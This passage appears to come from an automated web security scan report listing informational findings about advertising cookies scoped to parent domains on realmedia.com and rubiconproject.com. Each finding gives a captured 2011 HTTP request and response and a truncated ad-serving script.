document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246042735&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:40:42 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 403
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:41:42 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/143512920/Top1/USNetwork/BCN2011050683_001_InEx/2225-728x90-A2.jpg/726348573830336e
...[SNIP]...

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308242630186&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:43:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 430
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:44:50 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1838096624/Top1/USNetwork/BCN2011020713_001_AllMenus/ROCK_RETARGETING_728x90.jpg/72
...[SNIP]...

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308240767099&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:12:47 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3102
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:13:47 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO5018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308241388666&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO4018HQ|O1018HS|O2018RL|O2018UF|O2018XI; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:23:14 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO5018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3104
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:24:14 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018HS|O2018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O1018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:46:57 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018HS|O2018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 421
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:35:46 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/357900192/Top1/USNetwork/BCN2011050799_001_JacksonHewitt/JH.728x90-5.24.gif/7263485
...[SNIP]...

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308242009650&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:33:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3124
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:22:18 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.107. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Thu, 16-Jun-2011 12:54:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=72322; path=/; domain=.rubiconproject.com
csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202; expires=Thu, 23-Jun-2011 11:54:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-15.js?cb=0.13291361555457115&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225268837&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202; cd=false

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:54:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 12:54:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 16-Jun-2011 12:54:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=72322; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202; expires=Thu, 23-Jun-2011 11:54:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1924

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3187871"
...[SNIP]...

10.108. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Thu, 16-Jun-2011 13:25:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=70473; path=/; domain=.rubiconproject.com
csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; expires=Thu, 23-Jun-2011 12:25:26 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-2.js?cb=0.5658462722785771&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227124764&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888; cd=false

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:25:26 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 13:25:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 16-Jun-2011 13:25:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=70473; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; expires=Thu, 23-Jun-2011 12:25:26 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2066

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3183300"
...[SNIP]...

10.109. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Thu, 16-Jun-2011 16:26:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=11953^37; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=59618; path=/; domain=.rubiconproject.com
csi2=1300433.js^2^1308237983^1308237981&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 15:26:21 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; rdk2=0; ses2=11953^37; csi2=2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:26:21 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 16:26:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Thu, 16-Jun-2011 16:26:21 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=11953^37; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=59618; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^2^1308237983^1308237981&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 15:26:21 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: text/html
Content-Length: 1815

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

10.110. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Thu, 16-Jun-2011 16:36:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=11953^45; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=58996; path=/; domain=.rubiconproject.com
csi15=1300434.js^3^1308237982^1308238603&2553663.js^13^1308234261^1308238600&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; expires=Thu, 23-Jun-2011 15:36:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308238598325&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
